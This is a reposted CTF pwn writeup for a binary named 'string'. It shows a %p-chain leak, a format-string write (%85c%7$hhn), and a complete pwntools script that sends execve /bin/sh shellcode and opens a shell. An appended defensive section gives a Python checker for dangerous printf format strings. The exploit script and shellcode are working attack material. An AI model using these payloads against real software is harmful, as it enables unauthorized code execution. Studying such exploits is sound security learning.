Analysis of main
Look at the function's execution flow.
Using aaaa.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p we get the offset of format; since v2 sits one byte above format, that gives us the offset of v2.
Then, with the arbitrary write %85c%7$hhn, 85 is written into the lowest byte of v2,
and the shellcode gets executed.
```python
from pwn import *

# p = remote()
p = process('./string')
elf = ELF('./string')
context.arch = elf.arch

# The binary prints two addresses (secret[0] / secret[1]); parse them from its output.
p.recvuntil('secret[0] is ')
addr1 = int(p.recvuntil('\n')[:-1], 16)
log.success('addr1==>' + hex(addr1))
p.recvuntil('secret[1] is ')
addr2 = int(p.recv(7), 16)
log.success('addr2==>' + hex(addr2))

context.log_level = 'debug'
p.sendlineafter('What should your character\'s name be:', 'huzai')
p.sendlineafter('So, where you will go?east or up?:\n', 'east')
p.sendlineafter('go into there(1), or leave(0)?:\n', '1')
p.sendlineafter('\'Give me an address\'\n', str(addr1))
# Format-string write: %85c prints 85 bytes, then %7$hhn stores 85 into the low byte of v2.
p.sendlineafter('And, you wish is:\n', '%85c%7$hhn')

shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"
p.sendline(shellcode)
# pwntools shellcode alternative:
# p.sendline(asm(shellcraft.sh()))
gdb.attach(p)
p.interactive()
```
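As an added example (not part of the original writeup), here is a small static checker for untrusted input that a program might pass straight to printf() as its format argument. It models printf's output counter, which is exactly what lets %85c%7$hhn above store 85 into one byte, and flags strings that write memory (%n family) or read many stack slots (the %p chain used for the leak). The function name and the threshold of four stack reads are assumptions of this example.

```python
import re

# printf conversion specification: %[argpos$][flags][width][.precision][length]conv
SPEC_RE = re.compile(
    r'%(?:(?P<pos>\d+)\$)?(?P<flags>[-+ #0]*)(?P<width>\d+|\*)?'
    r'(?:\.(?P<prec>\d+|\*))?(?P<length>hh|h|ll|l|j|z|t|L)?'
    r'(?P<conv>[diouxXeEfFgGaAcspn%])'
)
# Bytes a %n variant stores, by length modifier (assumes LP64, as on the x86-64 target).
WRITE_SIZE = {'hh': 1, 'h': 2, '': 4, 'l': 8, 'll': 8, 'j': 8, 'z': 8, 't': 8}


def analyze_format(fmt):
    """Report what printf(fmt) would do if fmt came from an attacker.

    'leaks'   : argument slots read by value-printing conversions (%p, %x, %s, ...)
    'writes'  : [{'arg', 'size', 'value'}] per %n-family directive; 'value' is the
                byte count printed so far, truncated to the directive's store size
    'printed' : lower bound on bytes printf would emit for the whole string
    'suspicious': True if the string writes memory or reads several stack slots
    """
    printed = 0      # lower bound on bytes emitted before the current directive
    cursor = 0       # index in fmt up to which literal text has been counted
    next_arg = 1     # next sequential slot for directives without a positional index
    leaks, writes = [], []
    for m in SPEC_RE.finditer(fmt):
        printed += m.start() - cursor          # literal bytes before this directive
        cursor = m.end()
        conv = m.group('conv')
        if conv == '%':                        # "%%" prints one byte, consumes no arg
            printed += 1
            continue
        if m.group('pos'):
            arg = int(m.group('pos'))
        else:
            arg, next_arg = next_arg, next_arg + 1
        if conv == 'n':
            size = WRITE_SIZE.get(m.group('length') or '', 4)
            writes.append({'arg': arg, 'size': size,
                           'value': printed & ((1 << (8 * size)) - 1)})
            continue
        leaks.append(arg)
        width = m.group('width')
        # A numeric width pads to at least that many bytes; otherwise assume the
        # minimum: 0 for %s (empty string), 1 for everything else.
        printed += int(width) if width and width != '*' else (0 if conv == 's' else 1)
    printed += len(fmt) - cursor               # trailing literal text
    return {'leaks': leaks, 'writes': writes, 'printed': printed,
            'suspicious': bool(writes) or len(leaks) >= 4}
```

Running it on the writeup's payload reports a one-byte write of 85 to argument slot 7, which is the condition a defender would reject before the string ever reaches printf; the fix in the program itself is printf("%s", buf) instead of printf(buf).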
Reposted from: http://qtugf.baihongyu.com/